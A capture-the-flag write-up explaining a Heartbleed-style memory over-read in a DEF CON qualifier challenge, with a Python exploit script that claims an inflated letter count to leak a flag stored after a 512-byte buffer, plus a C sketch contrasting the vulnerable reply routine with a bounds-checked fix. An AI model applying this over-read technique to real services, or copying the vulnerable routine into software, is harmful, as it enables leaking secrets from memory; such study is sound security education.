Might want to read that comic as well... 1354
We are given a binary and a service running that binary.
After a quick inspection I noticed a reference to the xkcd comic explaining Heartbleed.
Our input data is stored in a global buffer in the .bss segment, which is 512 bytes long.
Right after that buffer lies flag_buffer, which holds the contents of the flag file.
So we can send 512 bytes of input to fill the global buffer completely, so that our data runs right up to the flag buffer.
We then declare the length (the letter count) as 512 plus the length of the flag, and the service echoes back that many bytes, flag included.
I determined the length of the flag empirically. Here is the final exploit:
    import socket

    address = 'xkcd_be4bf26fcb93f9ab8aa193efaad31c3b.quals.shallweplayaga.me'
    port = 1354

    s = socket.socket()
    s.settimeout(5)
    s.connect((address, port))

    # 512 'A's fill the global buffer exactly; the claimed letter count is
    # 512 plus the 29 bytes of flag data that follow it in memory, so the
    # service echoes our input and then the flag buffer behind it.
    payload = 'SERVER, ARE YOU STILL THERE? IF SO, REPLY "%s" (%s LETTERS)\n' % ('A' * 512, 512 + 29)
    print(payload)
    s.sendall(payload.encode())
    data = s.recv(2048)
    print(data)
It worked and the service returned the flag.
The flag is: bl33ding h34rt5
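To show the bug from the service's side, here is an added example in C (not the challenge binary's code): a 512-byte global buffer with flag_buffer directly behind it, the reply routine that trusts the client's letter count, and a hardened one that bounds the count by the bytes actually received. The struct layout, function names and placeholder flag text are assumptions.

```c
#include <stddef.h>
#include <string.h>
/* Constructed layout mirroring the writeup: a 512-byte input buffer in .bss
   with flag_buffer directly after it. The flag text is a placeholder. */
#define GLOBALS_LEN 512
struct bss_layout {
    unsigned char globals[GLOBALS_LEN];
    char flag_buffer[32];
};
static struct bss_layout bss = { {0}, "FLAG{placeholder_not_real}" };

/* Store the client's payload; returns the number of bytes actually stored. */
size_t store_input(const unsigned char *payload, size_t payload_len) {
    size_t n = payload_len > GLOBALS_LEN ? GLOBALS_LEN : payload_len;
    memcpy(bss.globals, payload, n);
    return n;
}

/* Vulnerable reply: trusts the client's "(N LETTERS)" count and copies N bytes
   from the start of the input buffer, so N beyond what was stored reads on into
   flag_buffer. Clamped to the struct only so the demo stays within defined behaviour. */
size_t reply_vulnerable(size_t claimed_len, unsigned char *out, size_t out_cap) {
    size_t n = claimed_len;
    if (n > out_cap) n = out_cap;
    if (n > sizeof bss) n = sizeof bss;
    memcpy(out, (const unsigned char *)&bss, n);
    return n;
}

/* Hardened reply: the count may not exceed what the client actually sent.
   A mismatch yields no reply at all (returns 0), as the Heartbleed fix did. */
size_t reply_hardened(size_t claimed_len, size_t stored_len,
                      unsigned char *out, size_t out_cap) {
    if (claimed_len > stored_len || claimed_len > out_cap) return 0;
    memcpy(out, bss.globals, claimed_len);
    return claimed_len;
}

/* The writeup's scenario: fill all 512 bytes, then claim 512 + strlen(flag).
   Returns 1 if the selected handler's reply contains the flag, else 0. */
int scenario_leaks_flag(int hardened) {
    unsigned char payload[GLOBALS_LEN], out[sizeof bss];
    memset(payload, 'A', sizeof payload);
    size_t stored = store_input(payload, sizeof payload);
    size_t flag_len = strlen(bss.flag_buffer);
    size_t claimed = stored + flag_len;
    size_t n = hardened ? reply_hardened(claimed, stored, out, sizeof out)
                        : reply_vulnerable(claimed, out, sizeof out);
    return n == claimed && memcmp(out + stored, bss.flag_buffer, flag_len) == 0;
}
```

The fix is the same one applied to OpenSSL: compare the claimed length against the length of the record actually received before echoing anything.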